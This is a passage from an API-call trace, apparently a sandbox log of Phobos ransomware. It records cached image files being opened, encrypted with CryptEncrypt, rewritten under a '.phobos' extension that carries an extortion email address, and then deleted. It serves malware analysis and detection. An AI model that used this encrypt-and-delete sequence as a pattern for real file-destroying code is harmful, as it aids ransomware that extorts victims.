dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0172.878] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0172.878] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0172.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0172.878] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0172.878] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0172.878] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x333f, lpOverlapped=0x0) returned 1 [0173.388] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3340, dwBufLen=0x3340 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3340) returned 1 [0173.388] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3340, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3340, lpOverlapped=0x0) returned 1 [0173.389] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0173.389] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0173.389] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0173.389] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.389] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0173.390] CryptDestroyKey (hKey=0xa32c68) returned 1 [0173.390] CloseHandle (hObject=0x190) returned 1 [0173.390] CloseHandle (hObject=0x148) returned 1 [0173.390] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg")) returned 1 [0173.391] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0173.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0173.392] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2452) returned 1 [0173.392] CloseHandle (hObject=0x148) returned 1 [0173.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg")) returned 0x2020 [0173.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0173.393] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0173.393] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0173.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0173.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0173.393] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0173.393] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x994, lpOverlapped=0x0) returned 1 [0173.395] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9a0, dwBufLen=0x9a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9a0) returned 1 [0173.395] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x9a0, lpOverlapped=0x0) returned 1 [0173.396] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0173.396] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0173.396] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0173.396] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.396] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0173.396] CryptDestroyKey (hKey=0xa32c68) returned 1 [0173.396] CloseHandle (hObject=0x148) returned 1 [0173.396] CloseHandle (hObject=0x190) returned 1 [0173.396] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbblhzx[1].jpg")) returned 1 [0173.397] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0173.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0173.398] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10425) returned 1 [0173.398] CloseHandle (hObject=0x190) returned 1 [0173.398] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg")) returned 0x2020 [0173.398] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0173.398] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0173.398] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0173.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0173.399] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0173.399] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0173.399] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x28b9, lpOverlapped=0x0) returned 1 [0174.234] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x28c0, dwBufLen=0x28c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x28c0) returned 1 [0174.234] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x28c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x28c0, lpOverlapped=0x0) returned 1 [0174.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0174.235] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.235] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0174.235] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.235] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0174.235] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.235] CloseHandle (hObject=0x190) returned 1 [0174.235] CloseHandle (hObject=0x148) returned 1 [0174.235] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbnieo[1].jpg")) returned 1 [0174.236] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0174.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.237] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5846) returned 1 [0174.237] CloseHandle (hObject=0x148) returned 1 [0174.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg")) returned 0x2020 [0174.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.237] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.237] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0174.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0174.238] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.238] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16d6, lpOverlapped=0x0) returned 1 [0174.391] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16e0, dwBufLen=0x16e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16e0) returned 1 [0174.391] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16e0, lpOverlapped=0x0) returned 1 [0174.391] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0174.391] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.391] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0174.392] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.392] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0174.392] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.392] CloseHandle (hObject=0x148) returned 1 [0174.392] CloseHandle (hObject=0x190) returned 1 [0174.392] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsqnl[1].jpg")) returned 1 [0174.393] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0174.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0174.393] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2420) returned 1 [0174.393] CloseHandle (hObject=0x190) returned 1 [0174.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg")) returned 0x2020 [0174.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0174.393] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.394] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.394] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0174.394] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.394] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x974, lpOverlapped=0x0) returned 1 [0174.588] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x980, dwBufLen=0x980 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x980) returned 1 [0174.588] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x980, lpOverlapped=0x0) returned 1 [0174.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0174.589] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.589] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0174.589] CryptDestroyKey (hKey=0xa32d28) returned 1 [0174.590] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0174.590] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.590] CloseHandle (hObject=0x190) returned 1 [0174.590] CloseHandle (hObject=0x148) returned 1 [0174.590] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 